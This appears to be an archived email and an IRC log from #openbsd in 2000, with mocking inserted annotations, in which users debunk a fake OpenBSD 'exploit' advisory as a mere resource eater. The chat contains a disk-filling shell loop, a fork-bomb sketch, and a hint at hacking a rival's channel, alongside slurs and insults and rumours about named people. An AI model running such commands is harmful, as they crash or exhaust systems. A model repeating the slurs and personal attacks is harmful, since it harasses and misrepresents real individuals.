Date: Sun, 5 Nov 2000 19:24:20 -0500
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700
not sure what you are thinking, but that is PERFECT grammer.
RL
----- Original Message -----
From: "John Kerbawy" <john@maKintosh.com>
To: <rloxley@hackphreak.org>
Sent: Sunday, November 05, 2000 6:33 PM
Subject: webpage.
> Someone is missing grammar clue.
>
> ---- http://www.hackphreak.org/rules/ ----
>
> 4: NO ADVERTISING IN THE CHANNEL OR IT'S TITLE BAR.
> ^^^^
>
> No advertising in the channel or it is title bar?
>
> oops.
>
> __
> John Kerbawy <john@maKintosh.com>
>
[END_CUT] funny_eMale
[CUT_HERE] irclogs
\xf9\xed\xf9 Starting logfile IrcLog
\xf9\xed\xf9 Topic (#openbsd): http://www.OpenBSD.org
\xf9\xed\xf9 Topic (#openbsd): set by john at Sat Nov 4 19:06:39 2000
\xf9\xed\xf9 [Users(#openbsd:63)]
[ ~el8 ] [ opcode ] [ influx_ ] [ carica ] [ Intrinsic ]
[ niekze ] [ slipdisc ] [ kahl ] [@obecian ] [ pdo ]
[ sizaym ] [ GoatBoy ] [ cell ] [@toor ] [@jeremie ]
[ binfalse ] [@Ambrose ] [ [rew] ] [ desti ] [ mollusk ]
[@dhartmei ] [ motorola- ] [ bn- ] [ loxariz ] [ _preD ]
[ StJohn ] [ gk ] [@Figz ] [ nj ] [ marc ]
[@hydro__ ] [@ActivatE ] [ joe- ] [ danp ] [@fx ]
[ ~el8 ] [ phidias ] [ Setzer ] [ bugoid ] [@uux- ]
[ tibim ] [ J0hnBlaze ] [ Slower ] [ sariel ] [@john ]
[ genecyst ] [ mogambo ] [ rwxr--r-- ] [ majidf ] [ jwit ]
[ GreyFoxx ] [ TAiNiUM ] [@SmooveB ] [ [frank] ] [ jethro ]
[ ratcorpse ] [ cazz ] [ kajar ] [ malte__ ] [ ar ]
[ Creamore ] [ _mojo ] [@spuug ] [ rys ]
\xf9\xed\xf9 [Users(#openbsd:0)]
\xf9\xed\xf9 ~el8 [~el8@~el8.com] has joined #openbsd
<rys:#openbsd> m3th: no clue.. running current?
<m3th:#openbsd> 2.7 yes
<rys:#openbsd> 2.7 stable or openbsd-current?
\xf9\xed\xf9 SignOff m3th: #OpenBSD (Read error 73: Connection reset by peer)
\xf9\xed\xf9 m3th [meth@bofh.bestweb.net] has joined #openbsd
<m3th:#openbsd> let me find a similar system, see if i can find the file
\xf9\xed\xf9 ^BBitchX^B: You are now talking to channel #Openbsd
\xf9\xed\xf9 ~el8 [~el8@~el8.net] has joined #openbsd
<~el8> Hello, I was wondering if there is a patch for the local root exploit fo
r OpenBSD (the one on packetstorm) ? And is it remote ?
\xf9\xed\xf9 laggn [operand@1Cust5.tnt2.roanoke.va.da.uu.net] has joined #openb
sd
<~el8> It says 'Vendor notified'
<~el8> And I don't see any vendor patches..
<laggn> when i go to the ftp mirrors and cd 2.8 there are no install files..is
there an ftp that i can go to that has the 2.8 install files?
[cell_X(blah@38.195.196.53)] just strip off the suid bit
<rys> ~el8: hold on
| rys (rys@supernal.godsey.net) (Internic Network)
\xb3 ircname : Joe
| channels : #openbsd #Icons_of_Vanity
\xb3 server : irc.west.gblx.net (Global Crossing West Client Server)
| away : rys - gone
: idle : 0 hours 0 mins 10 secs (signon: Sun Nov 5 11:54:14 2000)
<DesertFox> hi all
<dhartmei> ~el8: which one? libutil was fixed long ago.
<DesertFox> rys: there aren't any.
<cell_X> ~el8 are you talking about the /usr/bin/chpass issue..do chmod u-s /us
r/bin/chpass
<DesertFox> rys: i'm running 2.8 and i got it out of the snapshots dir
<~el8> Nope
<~el82> i see an advisory on the front page of packetstorm
<laggn> rys : yes, i see it there :)
<~el8> ~el82, yes, that is what I speak of
<~el8> I don't quite understand it, to tell you the truth
<cell_X> grr..wrong answer..
<cell_X> =)
<dhartmei> ~el82: url?
<~el82> packetstorm.securify.com
<~el83> theo is gay
<~el83> theo is gay
<~el83> theo is gay
<rys> yes he is but this channel is about openbsd not theo
<rys> just kidding
\xf9\xed\xf9 ~el83 [~el83@~el83.net] has left #openbsd []
<~el82> i dunnno
\xf9\xed\xf9 SignOff Brandon`: #Phrack ()
\xf9\xed\xf9 mode/#openbsd [+b *!*@*.eurocompton.net] by dhartmei
<rys> uh
<dhartmei> ~el82: where do you see obsd mentioned there? link to the specific a
rticle?
<DesertFox> from what i hear, theo's somewhat crabby.
<rys> http://packetstorm.securify.com/0011-exploits/hp2.adv
<spuug> theo is not gay.
<rys> theo is somewhat crabby
<rys> bit my head off like 1 1/2 years ago
<~el82> dhart: rys pasted
| dhartmei (~dhartmei@cable-ggar48-183.intergga.ch) (Switzerland)
\xb3 ircname : Daniel Hartmeier <daniel@benzedrine.cx>
| channels : @#openbsd #compsci @#unixhelp #atheism @#C++ @#c/c++ @#cryptonomic
on @#informatik
\xb3 server : irc.light.se (It's alive, it's AAALIIIIVEEE)
*** OBSDCMNT : ke4p n0te of th1z guy hez supr l4me ***
<laggn> DesertFox : exploit using ddb
<rys> regarding that sploit on packetstorm, obviously the author doesn't know w
hat a "local root exploit" is
<DesertFox> hmm...the advisory insults openbsd, and says NT and Linux are bette
r.
<rys> a local root exploit is not the ability to "crash the kernel"
\xf9\xed\xf9 SignOff m3th: #OpenBSD (Read error 73: Connection reset by peer)
<rys> christ i could do that with a fork bomb
*** OBSDCMNT : u k0uld r00t obsd w/ a f0rkb0mb ? ***
\xf9\xed\xf9 dew_freak [~dewfreak@ws037.bt.reshall.wwu.edu] has joined #openbsd
<laggn> ...rloxley..is that supposed to be robin loxley as in robin hood?
<DesertFox> rys: perhaps the advsory is fake?
\xf9\xed\xf9 SignOff binfalse: #OpenBSD (Ping timeout: 180 seconds)
<DesertFox> rys: otherwise the author likes to bs everything.
<rys> the author says that after crashing you can use ddb to debug and gain acc
ess
<laggn> Desert
Fox : im having a hard time finding it on the athor's site..do y
ou have a url?
\xf9\xed\xf9 SignOff [rew]: #OpenBSD (irc^BN^B 7.24 + 7.0 for mIRC (2000/03/17
22.00))
<rys> which is dumb because the system won't drop to ddb unless you have it set
up to do so
<rys> plus, if you have physical access to the box you can boot -s
<rys> and then change the root password..
<DesertFox> laggn: didn't see a url...
<rys> so..
<laggn> DesertFox : they list themselves as coming from hackphreak.org but ther
e is nothing on that site
<DesertFox> rys: you have to HAVE physical access to use ddb right?
<DesertFox> laggn: perhaps the advisory is a hoax?
<rys> DesertFox: after a kernel crash, i do believe so, unless we're talking ab
out the sparc version and you have a remote console via a console server
<DesertFox> rys: never seen a sparc, never used a spark...
<DesertFox> oops, "sparc"
\xf9\xed\xf9 nikhouri [nikhouri@hyrule.student.syr.edu] has joined #openbsd
<rys> sparcs have the ability to use a com port as console instead of a monitor
/keyboard
<laggn> DesertFox : i don't know..i mean, they don't have anything on their sit
e (it reads like a corp. brochure), and whats the difference between this and b
ooting -s?
<DesertFox> laggn: um...it requires crashing the kernel?
\xf9\xed\xf9 SignOff dhartmei: #OpenBSD (Read error: 54 (Connection reset by pe
er))
<rys> laggn: probably nothing.. the advisory mentions that you'll need to have
physical access..which is quite lame.
<DesertFox> therefore, this advisory is...
\xf9\xed\xf9 dhartmei [~dhartmei@cable-ggar48-183.intergga.ch] has joined #open
bsd
<DesertFox> pretty much harmless
<~el81> Doesn't seem harmless if any user can crash my OpenBSD though, damnit
<laggn> DesertFox : i guess the code needs to be tested and we'll find out its
validity (regardless of how convoluted it is)
<dhartmei> well, it crashes 2.7 release :)
<rys> ~el81: any user can crash your openbsd.. fork bomb baby
\xf9\xed\xf9 mode/#openbsd [+o dhartmei] by Ambrose
<the_gh0st> rys: true, but setting proccess limits could prevent that. a user c
an crash any os that way anyhow heh
<~el81> What about fork bomb protection?
<opcode> spuug: kdb?
<DesertFox> dhartmei: what about 2.8?
<dhartmei> don't have a -current system ready to test
<~el82> it crashed my 2.6 box....
<rys> ~el81: try setting a ulimit
<~el81> Yeah I tested on all of my OpenBSD & one NetBSD, crashed them
\xf9\xed\xf9 SignOff pent: #OpenBSD (ircII EPIC4-0.9.1 -- Accept no limitations
)<rys> i'm looking at the code right now..
<rys> it's small enough to figure out
*** OBSDCMNT : th1s guy k4nt figure it 0ut h4h4 watch u'll s33 ***
<laggn> man, how could they even mention NT? and are they mentioning linux to c
over their bases?
<dhartmei> they call it a remote exploit: "log in to the remote host, download
exploit, run it", lol
\xf9\xed\xf9 SignOff nikhouri: #OpenBSD (^BBitchX^B: the choice of a GNU genera
tion)
<DesertFox> this advisory is just really, really funny.
<rys> uhm
<rys> it's a fork bomb
\xf9\xed\xf9 nikhouri [nikhouri@hyrule.student.syr.edu] has joined #openbsd
<rys> fd = open(argv[0], O_RDONLY)
<~el82> how is a security hole "funny"
<rys> fstat(fd)
<rys> (get the file name)
<rys> write it to a file
<dhartmei> and a reference to obecian :)
<rys> then execute that file
<rys> well write it's own name to a file
<rys> then execute it
<rys> so it's just a bloat program
<rys> see the execlp at the end?
*** OBSDCMNT : execlp() fork() bomb? h4m! ***
<~el81> It's just a fork bomb? Doesn't say so in the adv, and doesn't seem to b
e
<rys> read the code
<~el81> I did, I don't see fork() in there
<rys> all it does is stat itself for it's own name
<rys> well okay it doesn't fork
<spuug> I'd like to see a pipe(2)bomb.
<rys> but imagine a program execing itself over and over again
*** OBSDCMNT : eye'm im4g1n1ng 1t, d0eznt se4m 2 b s0 b4d ***
<laggn> hrm, its dinner time, and i am glad that the advisory is just an advert
isement for themselves
<dhartmei> yes, the comments are just utter BS :)
<laggn> nite all and thanks for pointing me in te right direction rys
<rys> laggn: np
<DesertFox> ~el82: no, the way it's written, i'm not say the exploit is funny.
\xf9\xed\xf9 SignOff laggn: #OpenBSD (take care :))
<~el81> My boxes all have dropped into ddb
<rys> ~el81: but to access ddb you need to have physical access to the boxes
<~el81> Yes I know
<~el81> But it's still crashing my damn box
<rys> in which case you could boot -s anyways
<rys> set a process and memory limit per user
<rwxr--r--> resource killer = forkbomb == lame
*** OBSDCMNT : SIL FROM ANTIOFFLINE == L4M3! BW4H4H ***
<~el81> This is synonomous to that old arp cache DoS
<rwxr--r--> you could cat file >> file and do the same
*** OBSDCMNT : sure u k0uld p4l ***
<~el81> Hm, damn, I guess I'll just set limits then
<~el82> this still crashes all my openbsd boxes... when can i see a fix?
<rwxr--r--> just will waste the machine's resources and eventually cause a cras
h ;\
<rys> 744: would probably take longer though
*** OBSDCMNT : h4kr b0nd1ng at 1tz b3st .. "744" ***
<~el81> and run that forkbomb protector lkm
\xf9\xed\xf9 SignOff hydro__: #OpenBSD (Idle time limit exceeded)
<rwxr--r--> rys true ;) i didnt see the original beginning of this thread
<rys> ~el82: set process and memory limits per user
<rys> 744: http://packetstorm.securify.com/0011-exploits/hp2.adv
<rys> fake advisory
*** OBSDCMNT : F$KE?! ***
<rwxr--r--> but from what i do see this is a forkbomb junky script kiddiot root
ard script
*** OBSDCMNT : ur a m0r0n, *PAL* ***
\xda\xc4\xc4\xc4\xc4\xc4---\xc4--\xc4\xc4-\xc4\xc4\xc4\xc4\xc4\xc4---\xc4--\xc4
\xc4-\xc4\xc4\xc4\xc4\xc4\xc4\xc4\xc4\xc4--- -- -
| rys (rys@supernal.godsey.net) (Internic Network)
\xb3 ircname : Joe
| channels : #openbsd #Icons_of_Vanity
\xb3 server : irc.west.gblx.net (Global Crossing West Client Server)
: idle : 0 hours 0 mins 12 secs (signon: Sun Nov 5 11:54:14 2000)
*** OBSDCMNT : m4ybe he sh0uld b in #ic0nz_of_stup1dity ***
<rwxr--r--> bbias will check it now
\xf9\xed\xf9 tequiare [condor@feather.net] has joined #openbsd
<rwxr--r--> rys^B:^B its a stupid lame 0-day forkbomb
*** OBSDCMNT : 0d4y f0rkb0mb ? wh4t sc3n3 do u bel0ng 2 br0?! ***
<rys> 744: well it doesn't really fork but yeah your right
<rwxr--r--> and i still see what this has to do with openbsd
<rwxr--r--> rys^B:^B resrouce killer
<rys> 744: seems to be a n advertisment for them
<dhartmei> the only original thing about it is the description
<DesertFox> yes...
<rwxr--r--> i should download it to my openbox and tinker with it but it was wr
itten really lame
*** OBSDCMNT : du0d ur a fukn idi0t ***
<rys> yeah hehe
<DesertFox> too much bs?
<rwxr--r--> and i dont have time ... besides they put down obecian in it and he
's cool as shit so fsck them
<DesertFox> well, yes, that too.
<DesertFox> :_
<DesertFox> oops, :)
<DesertFox> heh
<rwxr--r--> theres little intellect in doing that code since you could code a p
erl script to open up a shitload of resources and do the same
*** OBSDCMNT : u #openbsd k0q sukrz r quik to the dr4w, det4ilz bub ***
<rwxr--r--> without writting all kinds of funky shit in a so calle dadvisory
<~el82> why doesnt obsd have these ulimits by default?
<rwxr--r--> i should go pimpslap rloxley
*** OBSDCMNT : rl0xley w0uld kiq ur fukn a$$ bytch ***
<rwxr--r--> ~el82^B:^B i didnt write open so i dont know
<~el81> Holdon guys, something is bothering me
<DesertFox> where do you edit the settings?
<~el81> How could re execve()'n over and over crash your box in 1 microsecond?
<opcode> haha he tells obecian "to hell with you" specifically..
<rwxr--r--> but that advisory was half assed as shit... and to quote from the a
uthor MY GRANDMOTHER couldve done better
<~el81> And it doesn't even use fork
<rys> why would you set ulimits
<rys> i don't want my x session ending every time i run netscape
\xf9\xed\xf9 ~el83 [~el83@~el83.net] has joined #openbsd
<rwxr--r--> anyways... for those sysadmins/sec engineers/fw people I threw up a
quickie primer for hardware on stopping/slowing down dos attacks
<dhartmei> the only interesting line is "ehdr->a_data += 3;", what's that for?
*** OBSDCMNT : w1ll he succeed?!?!!? ***
<rys> see struct exec
<rwxr--r--> if anyone is interested its at www.antioffline.com/stoppingdos.php3
along with all my other crap
<bugoid> where did you get those beeyootiful pictures?
<ratcorpse> rys> 744: http://packetstorm.securify.com/0011-exploits/hp2.adv
<ratcorpse> <rys> fake advisory
<ratcorpse> <rwxr--r--> but from what i do see this is a forkbomb junky script
kiddiot
<ratcorpse> rootard script
<~el81> Hey, you're that antioffline guy? good work :)
<ratcorpse> dude
<ratcorpse> 1-rloxley is a retard
<ratcorpse> 2-he cant even fucking spell
<rys> hehe
<ratcorpse> and its so disgusting that he mentions SSG
<rwxr--r--> if ( (fd = open("/dev/zero", O_RWDR)) == -0)
<ratcorpse> Credits : www.hackphreak.org, zsh.interniq.org, www.subterrai
n.net |
<ratcorpse> oh my god man
<ratcorpse> he even mentioned US
<rwxr--r--> print "\nHi 3y3 4m rl0xl3y f34r my scr1pt\n";
*** OBSDCMNT : y0u d0nteven kn0w C k1d ***
<ratcorpse> this is hilarious
<ratcorpse> ;]
<ratcorpse> man i feel like puking now
<dhartmei> exec.a_data /* initialized data size */, why increase it?
*** OBSDCMNT : he w0nt get it, sory to sp0il the fun ***
<ratcorpse> the last thing i want to see is my group written in the same line w
ith hackphreak losers
<ratcorpse> god damnit
<dhartmei> to consume more resources?
<rys> possibly, proably just code bloat
<opcode> www.sneakerz.org/~rat ?
<rwxr--r--> ratcorpse... sinnerz?
<rwxr--r--> as in coda hale's sinnerz?
<ratcorpse> nah
<ratcorpse> zsh
<ratcorpse> opcode: yes
<rwxr--r--> ahh thought it was frmo the old sinnerz.com crew
<ratcorpse> sinnerz is a non-technical channel tho
<opcode> ZSH (soon) ? hah
<ratcorpse> nah
<rwxr--r--> damn my typos suck
<ratcorpse> zsh is ded
<ratcorpse> its now lowlevel.interniq.org
<ratcorpse> dead
<ratcorpse> man rloxley is soo gay
<kajar> kicks sil
<ratcorpse> i cant believ he wrote crap like this and used ppls names to rant
<rwxr--r--> sup raj :)
<kajar> just woke up ;) crazy night last night
\xf9\xed\xf9 SignOff marc-: #OpenBSD (Read error 73: Connection reset by peer)
\xf9\xed\xf9 marc- [marc@h24-65-26-78.gv.shawcable.net] has joined #openbsd
<rwxr--r--> hehe shit i didnt go to sleep till it was 7am EST
<rwxr--r--> and woke up at 9am EST =[ hehehe
\xf9\xed\xf9 hydro__ [hydro@9mm.com] has joined #openbsd
<ratcorpse> AHHAHAH
\xf9\xed\xf9 rwxr--r-- is now known as n1nor_
<ratcorpse> man
<ratcorpse> thsi shits hilarious
\xf9\xed\xf9 mode/#openbsd [+o hydro__] by dhartmei
<ratcorpse> man oh man
\xf9\xed\xf9 n1nor_ is now known as slutpuppy
<rys> haha
<rys> it only took em a few moments to notice there was an execlp at the bottom
*** OBSDCMNT : y4h du0d m0st people m1ss th4t ***
<ratcorpse> dude
<rys> and the funny part is at the top..#define CRASH_FILE "./f0rKb0mB"
*** OBSDCMNT : d1d we fo0l u fatboy? ***
<ratcorpse> that guy is a fucking moron
<rys> hahah
<ratcorpse> i cant believe he even put caddis and obecian
<slutpuppy> pfffttt what a fucknut
<ratcorpse> no shit
<ratcorpse> ZSH soon
<ratcorpse> HAHAHHAH
<ratcorpse> yah shuuure we need some 50 year old 800 lbs morons to code warez w
ith us ;]
\xf9\xed\xf9 mbhochha [~mbhochha@worm.student.syr.edu] has joined #openbsd
<dhartmei> i like the explanation of why this is a _remote_ exploit best
<DesertFox> should we chagne the topic to this?
*** OBSDCMNT : eye w1sh u w0uld ***
<opcode> dhartmei: yes me too.. it all makes so much sense after his 3 point ex
planation..
<ratcorpse> Theo de Raadt and the OpenBSD Team
<ratcorpse> Paedophiles
<ratcorpse> Rascists
<ratcorpse> dude
<ratcorpse> see what a fuckign moron he is ,, he cant even spell 'racist' corre
ct
<DesertFox> maybe it's because he can't hack OpenBSD!
<ratcorpse> dude
<ratcorpse> he cant even root his own box
<DesertFox> haha
<ratcorpse> he knows 0
<rys> hehe i bet he can
<rys> boot -s
<DesertFox> i'm still learning...
<ratcorpse> hes a 50 somehting year old 800 lbs guy
<ratcorpse> i saw him at defcon
<~el81> Haha, yeh topic'n this dumb adv would be funny, like dissing the morons
who wrote the adv
<rys> ratcorpse: are you serious?
<DesertFox> that's very scary...
<DesertFox> especially the fact that a 50 year old wrote this...
<opcode> Assume the location of the box which crashed (@ the colo) ?
<opcode> is he suggesting you break & enter?
<ratcorpse> rys: i swear to god man
<dhartmei> if you look at the typos in the comments, it looks like the author i
s german, and there were peoples that complained here and on the mailinglists t
hat they were not 'properly informed' about the patches.
*** OBSDCMNT : d4mn, wh0 fukn c4rez? ***
<ratcorpse> he even has some pics public
<ratcorpse> i can understand why he talks shit to zsh but i have no idea why he
talks shit to obecian
<DesertFox> move off the advisory for a second, i'm wondering if you have denie
d access to finger, how do you make it show another filek, instead of "Connecti
on Refused"
<ratcorpse> like
<ratcorpse> hes old enuff to be obecians grandfather and obecians left nut has
more skill than 100 ppl like him
<DesertFox> obecian seems like a very nice person.
<DesertFox> i've talked with him a few times.
\xf9\xed\xf9 pent [dschwarz@house.beats.org] has joined #openbsd
<spuug> It must be the fog in Ocean Beach.
\xf9\xed\xf9 datawar [~dw@esefin1.essex.ac.uk] has joined #openbsd
\xf9\xed\xf9 SignOff gaurdian: #OpenBSD (Ping timeout: no data for 246 seconds)
<ratcorpse> packetstorm is gay for letting him submit this shit
*** OBSDCMNT : y0u are g4y ***
<slutpuppy> or echo "i am leet" > /tmp/file
<DesertFox> wait, how do you make it dislpay a text file?
<ratcorpse> ;]
<slutpuppy> finger stream tcp nowait root cat /tmp/file
<DesertFox> okay.
<DesertFox> thanks
\xf9\xed\xf9 nikhouri [nikhouri@hyrule.student.syr.edu] has left #OpenBSD []
<~el81> Damn, I set limits etc, and it still crashs my OpenBSD's
<~el81> bbl
<ratcorpse> <jimjones> how can you greet SSG and say fuck you to obecian
<ratcorpse> HAHAHH
<slutpuppy> hahahahahahahahahahahahahaha
<slutpuppy> http://www.attrition.org/mirror/attrition/2000/04/16/www.i-need-hel
p.com/ <--- rloxley the hacker
<slutpuppy> pfft script kiddiot
<john> sigh.
<rys> john you been watching?
<rys> hehe
<john> No.
\xf9\xed\xf9 mode/#openbsd [+m] by john
<john> woo.
\xf9\xed\xf9 mode/#openbsd [+o kahl] by john
<toor> john
<toor> bend over dude
\xf9\xed\xf9 mbhochha [~mbhochha@worm.student.syr.edu] has joined #openbsd
<john> ;9
<toor> i have a hard something to shove up in your gaping orifice
\xf9\xed\xf9 mode/#openbsd [-m] by john
<john> n0 thx!
<toor> plz :(
<toor> its not like 90% of #OpenBSD hasn't been there :P
<toor> brb ;)
<rys> john you seen the fake advisory on packetstorm?
*** OBSDCMNT : F4KE?! ***
<john> No.
<john> URL?
<rys> http://packetstorm.securify.com
<rys> top right column (hp2.adv)
<rys> it's a resource eater
*** OBSDCMNT : UR N0T 2 SM4RT ***
<john> That mouseover shit is lame.
<ratcorpse> ddue its so gay
<ratcorpse> packetstorm releases anythig u send
<ratcorpse> w/o checking
<rys> hehe i released something on the original packetstorm and the guy posted
it
<rys> lame perl script.. he even thanked me..
<rys> then antionline killed it
<ratcorpse> the funniest part his where he greets ssg and says fuck you to obec
ian
<rys> heh
<ratcorpse> hahahh
<ratcorpse> rloxgay is tryint to rant on our name
<ratcorpse> and slander us
<ratcorpse> ;thanks for zsh for the scripts' heh
*** OBSDCMNT : AREN'T Y0U ALRE4DY SL4ND3RD?! ***
<slutpuppy> welp... mickeysoft was owned again it seems
<slutpuppy> hehehe http://www.infoworld.com/articles/hn/xml/00/11/03/001103hnha
cker.xml
<john> What the hell is the deal?
\xf9\xed\xf9 nosaj [jason@codemonkey.net] has joined #openbsd
<john> haha.
<john> 4: NO ADVERTISING IN THE CHANNEL OR IT'\x92S TITLE BAR.
\xf0 john/#OpenBSD sends grammar.clue -> hackphreak.org
<slutpuppy> sorry john
<slutpuppy> doh i thought you mant me for posting that url
<john> Well.
<john> You fuckers can't put a sentence together either.
<rys> haha
<mogambo> heh
\xf9\xed\xf9 SignOff xdm: #Phrack (Ping timeout: 180 seconds)
\xf9\xed\xf9 shinobi [shinobi@naughty.monkey.org] has joined #openbsd
<ratcorpse> john did you seee the fake advisory
<ratcorpse> man i dont know what this retard is trying to do
<john> What's fake about it?
<rys> it claims to be a remote exploit
<ratcorpse> look at the code man
<rys> it's just a resource eater
<ratcorpse> if you look at the crap he wrote in the beginning ull see its fake
<ratcorpse> before you even see the code
<dhartmei> read the explanation of why it's supposed to be a remote exploit :)
<ratcorpse> SG helped during the researching of the bug (bind, aempire, cripto)
.<ratcorpse> I would like to thank RootShellHackers and Team ZSH for rigorously
testing on many freenets :] (ratcorpse and her great mass testing
<ratcorpse> scripts, great for analysis: www.sneakerz.org/~rat < great
site :)
<ratcorpse> lies
<ratcorpse> he put us and gay deface kids together in the same sentence
<ratcorpse> he even put solar designer
<ratcorpse> and i never coded a mass resolution script
<ratcorpse> its jim's script
<ratcorpse> haaahah
*** OBSDCMNT : at th1s point im gonna st0p doing commentz ***
\xf9\xed\xf9 SignOff mbhochha: #OpenBSD (Ping timeout: 180 seconds)
<ratcorpse> that idiot is just senile
<dhartmei> so, packetstorm publishes any submission without checking it at all?
so much for that.
<ratcorpse> Basically, if the (sz & (PAGE_SIZE-1)) is true, the kernel
<mmap`> I was wondering
<ratcorpse> panic()'s. Not so cool Mr. Theo, my grandmother wouldn't even have
<ratcorpse> done something so stupid and all she has is an A+ and CCNA!
<mmap`> how come bind9 coredumps in a chroot
<ratcorpse> thsis is hilarious man
<mmap`> like chroot /home/dns /bin/named -u -g, it runs, 4 secs after, it cored
umps.
<mmap`> heh
<john> du0d.
<rys> mmap: opcode is looking at the same thing
<~el81> i looked into the technicalities of the bug and rloxley is DEAD on
<~el81> When can I expect a patch?
<mmap`> I think the problem is the new thread implementation
<rys> ~el81: christ, for the 10th time, set ulimits
<mmap`> if i run the chroot as root user, it doesnt break
<~el81> I mean, my servers will go down in a heartbeat.
<~el81> How can I fucking set limits on a kernel bug? Jesus
<mmap`> uh?
<mmap`> the fuck is wrong?
<rys> ~el81: it's not a kernel bug, set process limits per user and it'll log y
our user out before the program can fork bomb
<rys> unless, that is, if you're root.
<~el81> For god sakes man, it's not a fork bomb, I've looked at the code. I see
no fork()
<mmap`> it could be a loop
<rys> are you fucking retarded.. read the code. it executes itself until it use
rs up all availible memory
<rys> mmap: packetstorm.securify.com openbsd "advisory" on the top
<rys> it's fake
<~el81> If you had an ounce of clue, I would continue talking to you
<mmap`> uh
<~el81> Where is John, he himself even said it is not fake
<mmap`> ~el81, g0 tr4d3 w4r3z, wh3r3z y3r c0ur13r
<mmap`> ?!
<rys> ~el81: i do have a clue. do you even know c/c++
<~el81> I'm being serious, sorry I'm being angry
<mmap`> rys, where it is?
<~el81> rys, sorry just calm down
<mmap`> give me link
\xf9\xed\xf9 [4mat] [k5@dialin-12-212.montreal.primus.ca] has joined #openbsd
<john> * Log into the remote host
<[4mat]> can anyone help me install OpenBSD, man this is getting on my nerves .
.<john> haha.
<john> * Log into the remote host
<mmap`> 4mat, read docs
\xf9\xed\xf9 tashie [~natasha@nic-25-c112-244.mn.mediaone.net] has joined #open
bsd
<dhartmei> nice, eh?
<john> * Grab our exploit
<john> ...
<tashie> Evenin all.
<rys> http://packetstorm.securify.com/0011-exploits/hp2.adv
<[4mat]> mmap` from ?
<john> Three years without a remote hole? Strike that.
<mmap`> www.openbsd.org/faq
<[4mat]> shit
<dhartmei> wonder what a local hole is, compared to that ;>
<[4mat]> i switched to open bsd cause no exploit
<[4mat]> that's mad ghey
<mmap`> we are not msnhelp, read it, if you got a non documented question, we w
ill help.
<[4mat]> just got rooted yesterday
<rys> it's not an exploit
<rys> i wish someone would explain the code, it's just a resource eater
<slutpuppy> rys i dont know why your bothering with these rootards
<rys> slutpuppy: i wonder myself.
<tashie> I was lookin for someone named cakespoon or something like that
<tashie> he invited me to kinda join
<tashie> is he still here?
<slutpuppy> int ptr* /* er3et codinh */
<tashie> w/a different nick?
<tashie> sorry to bother ya'll
<slutpuppy> if (Fork() == 0) {
<slutpuppy> ...
<slutpuppy> }
<slutpuppy> ...
<dhartmei> rys: i now understand it pretty well, it's pretty much the same as a
"execlp(argv[0], 0);"
<slutpuppy> printf "\n 3y3 y4m rl0xl3y\n";
<rys> dhartmei: yeah that's about it
\xf9\xed\xf9 SignOff ar: #OpenBSD (Hmmm. EPIC4-0.9.10-SSL has another bug. Go
figure...)
<rys> he just bloated it
<tashie> Ok I tried... if u know him... thanks
\xf9\xed\xf9 tashie [~natasha@nic-25-c112-244.mn.mediaone.net] has left #openbs
d []
<dhartmei> which i would call a fork bomp even though it's not using fork(), ev
en the author used the term 'f0rk'
<ratcorpse> i think its not rloxgay who wrote this shit
<rys> hmmm my front door is wedged open
<ratcorpse> its someone else who tried to fuck with us, ssg, teso and rloxgay
<ratcorpse> ;]
<rys> (apartment complex).. guess i don't have to log out after all
<mmap`> rys, lol that code is mad newbie
<rys> mmap`: no shit.. it's just funny that it got posted to packetstorm
\xf9\xed\xf9 ~el83 [~el83@~el83.net] has left #openbsd []
<rys> it's even funnier that there are still clubies in here that are asking wh
en we're going to have a patch
<mmap`> ya
<mmap`> lol
<dhartmei> i'm beginning to think their trolls
\xf9\xed\xf9 mortay [rifug@rifug.org] has joined #openbsd
<dhartmei> they're, even
<mortay> anyone play red alert 2 online here?
<mmap`> forkbomb doesnt mean the fork() function is being used, it means someth
ing is taking up resources
<mmap`> send me red alert and ill be glad to play.
<mortay> mmap`^B:^B hmm, its two cd's
<ratcorpse> rys: packetstorm is retarded and they dot check codes. they just lo
ok at the name
<mmap`> mortay, ic.
<ratcorpse> u can defeat fork bombs in solaris
<ratcorpse> i dont know know about obsd
<mortay> can i
<ratcorpse> u can limit stuff in /etc/system
<mmap`> another thing that makes me laff
<mmap`> is the lame faqs on security focus
<ratcorpse> yah no shit
<mmap`> they have like part I, then part II is the same as part I
\xf9\xed\xf9 mode/#openbsd [+m] by john
<john> Anyone mind?
\xf9\xed\xf9 mode/#openbsd [+oo shinobi nosaj] by john
\xf9\xed\xf9 mortay [rifug@rifug.org] has left #openbsd []
\xf9\xed\xf9 mode/#openbsd [+o jethro] by john
\xf9\xed\xf9 SignOff dew_freak: #OpenBSD (Dead socket)
\xf9\xed\xf9 fatal [~gem@193.10.185.3] has joined #openbsd
\xf9\xed\xf9 SignOff batz_: #Phrack (Idle time limit exceeded)
<john> Wendy's is looking good.
<john> Be right back. :)
<john> http://www.makintosh.com/~john/Misc/rloxley.txt
<dhartmei> john: grammer? lol
<john> I know.
<john> "it's"
<john> heh.
<~el82> theo, anyone: when can i expect a patch for the attack described in the
'hackphreak advisory'
<dhartmei> re packetstorm: "Thanks for the mail! I really should have read it
much more carefully, it was added in a hurry. -Alan", and gone it is :)
<rys> obecian: hey you seen the advisory?
<rys> heh mmap`.. packetstorm removed the advisory
<mmap`> haha
<mmap`> lol
<mmap`> about time..
<rys> i had it bokmarked.. it's gone
<rys> mmap: hey http://www.hackphreak.org/admin/ if you ever want to hack their
channel
<rys> ratcorpse: heh trying to get a copy of the "advisory" from undernet
<rys> haha
<ratcorpse> they rm'ed it from packetstorm
<mmap`> haha
<ratcorpse> cauzsei i found ho wrote it
<ratcorpse> he denied it
<ratcorpse> and it was gone with jet speed
<mmap`> who wrote it.
<ratcorpse> http://sneakerz.org/~rat/hp2.adv
<ratcorpse> rash akd m1x of security.is
<ratcorpse> security.is guys are very upset about it
<john> ratcorpse, quit.
<john> I've heard enough of that shit.
<mmap`> lol
<ratcorpse> we suspect some other ppl but hat guy is the one who wrote it most
likely since the article is 'gonew' right afteer everyone yelled at him ;]
<rys> ratcorpse: haha
<ratcorpse> john: ok
<mmap`> echo penis > penis ; while (true) ; do cat penis >> penis ; done is als
o forkbomb
<mmap`> its lame.
<john> From: rloxley <rloxley@HACKPHREAK.ORG>
<john> Subject: OpenBSD Exploit
<john> toor^B:^B BUGTRAQ@SECURITYFOCUS.COM
